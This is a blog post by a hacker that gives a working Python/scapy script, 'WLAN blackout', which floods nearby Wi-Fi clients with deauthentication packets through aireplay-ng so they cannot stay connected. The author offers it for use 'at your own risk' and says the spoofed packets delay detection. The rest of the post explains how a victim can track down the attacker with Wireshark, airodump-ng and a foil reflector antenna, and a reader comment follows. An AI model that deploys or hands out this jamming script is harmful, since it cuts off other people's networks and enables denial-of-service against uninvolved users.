How to burn down any wireless network around you and how to find out the exact location of a wireless laptop
I made a program which will monitor the air for connections between wireless hot spots and hosts, if the program will find a connection it will send a deauth packet which will disconnect the client, this goes at such a high speed that clients will have no chance to establish a proper connection to the router.
Here is the code:
[python]
#!/usr/bin/python
try:
import sys,os
from scapy.all import *
except:
print "[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed"
sys.exit(0)
def deauth_flood(p):
if p.haslayer(Dot11):
mac = {}
mac["ap"]=p.sprintf("%Dot11.addr1%")
mac["station1"]=p.sprintf("%Dot11.addr2%")
if not mac["ap"]=="ff:ff:ff:ff:ff:ff" and mac["station1"]!="None":
os.system("aireplay-ng -0 1 -a "+mac["ap"]+" -c "+mac["station1"]+" "+sys.argv[1]+" &")# Remove " &" for a slower attack rate.
def instructions():
print "== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n"
print "python "+sys.argv[0]+" [iface]"
print "python "+sys.argv[0]+" mon0"
if len(sys.argv)>1:
print "[+] Searching for packets..."
sys.exit(sniff(iface=sys.argv[1],prn=deauth_flood))
else:
sys.exit(instructions())
[/python]
Use at your own risk, you won't be detected too fast since you send entirely spoofed packets but with the right equipment and skills on the side of the victim side he will be able to do it, normally when these kinds of attacks are launched at company's they will have to ask the ISP to come with a special device which will track down the exact location of the device.
But what when you are being targeted by this attack?
First you have to know that this might be hard to detect since it can be exploited from very custom locations, think about:
- Attacker is at 1 location not too far away; for example in a car
- Moving attacker walking around with a laptop in bag
- Infected/botted computer(s) of any kind, could even be your heat pump or light system control system in this case
- Malicious pineapples
- Phones (like the iphone)
- Satellite dish pointed to you
- Infected satellite
Understand that it is impossible to counter some of these attacks but an iphone or car should be tracable.
Requirements:
- Movable Linux based PC with wireless capability; if you don't have a *nix system you can download backtrack for free, burn it to a DVD and boot from it; in the case your PC can't boot DVD's you can go for an Ubuntu live CD or another distribution, booting from these CD's won't change anything to your actual system.
- Wireshark (free)
- Aircrack-ng (free)
optional:
- poitable antenna
- thin foil
- scissors
- glue
- cardboard (or other hard bendable material)
Why thin foil, scissors and cardboard? To locate the attacker; it would be ideal to have a parabolic reflector to decrease the time it will take for localizing the attacker.
You can make the windsurfer or be creative and make something custom, the idea is that you can eliminate 1 side of the antenna and reflect that to the side where you point it to increase your range and elimate the chance of the attacker being behind the antenna.
When you have all requirements you can get started, move in the middle of the deauth packets storm and turn on Wireshark & airodump-ng.
In wireshark apply "radiotap.length==13" as filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng.
Look at the rate with which you capture deauth packets and look in the bottom fields for the connections between routers and hosts, look at the PWR levels here.
Now move the windsurfer 90 degrees and look at the rate at which you capture and the deauth packets now, decide if it was less or more, redo this progress until you find the location at where the deauth packets have the highest rate, when being in a building it would be smart to also look under and above you.
Once you localized the location where the most deauth packets came from move your PC closer to that source, then redo the process of monitoring where the packets come from and look at aircrack-ng.
Once you are very very close you can determine which MAC address is doing this by looking it up in airodump-ng, this machine at that moment will have a very low PWR (0 until -50 is good enough).
Now run this command in bash to determine the manufacture of the card so you know something more about the attacking machine.
cat `locate manuf` | grep 00:11:22
Replace the latest part with the first part of the MAC address for example when you found the MAC address 55:44:33:22:11:00 then 55:44:33 is the part you will need.
Please note that this MAC address can be spoofed and/or not broadcasting so you won't be able to see it, then you have to do it all with Wireshark and determine where the most packets come from.
After you did all this you can just grab that malicious pineapple and smash it as hard as you can.
14 Comments
-
-
-
-
-
-
-
-
-
-
-
-
-
KIAaze says:
Do you have to set the wireless interface to monitor mode or something like that first?
Does the machine running wireshark have to be connected to a wireless access point first or not?I'm trying to check for deauth packets now (because my wireless keeps disconnecting/failing to connect), but wireshark doesn't see anything at all, even without the filter.
-
Hello, I am Jelmer born in 1991 and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com Or you can chat with me in the IRC.